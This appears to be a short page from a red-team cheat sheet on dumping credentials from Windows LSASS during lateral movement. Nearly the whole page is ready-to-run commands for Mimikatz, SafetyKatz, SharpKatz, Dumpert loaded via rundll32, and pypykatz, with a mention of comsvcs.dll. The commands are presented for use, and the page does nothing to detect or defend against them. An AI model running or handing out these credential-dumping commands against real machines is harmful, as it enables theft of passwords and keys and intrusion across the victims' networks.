Mimikatz
Mimikatz
Lateral Movement - Extracting credentials from LSASS
Dump credentials on a local machine
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'Using SafetyKatz(Minidumpof lsassand PELoaderto run Mimikatz)
SafetyKatz.exe "sekurlsa::ekeys"Dump credentials Using SharpKatz(C# port of some of Mimikatz functionality)
SharpKatz.exe --Command ekeysDump credentials using Dumpert(Direct System Calls and API unhooking)
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,DumpUsing pypykatz(Mimikatz functionality in Python)
pypykatz.exe live lsaUsing comsvcs.dll
Over Pass The Hash Lateral Movement is in Lateral Movement section.
Last updated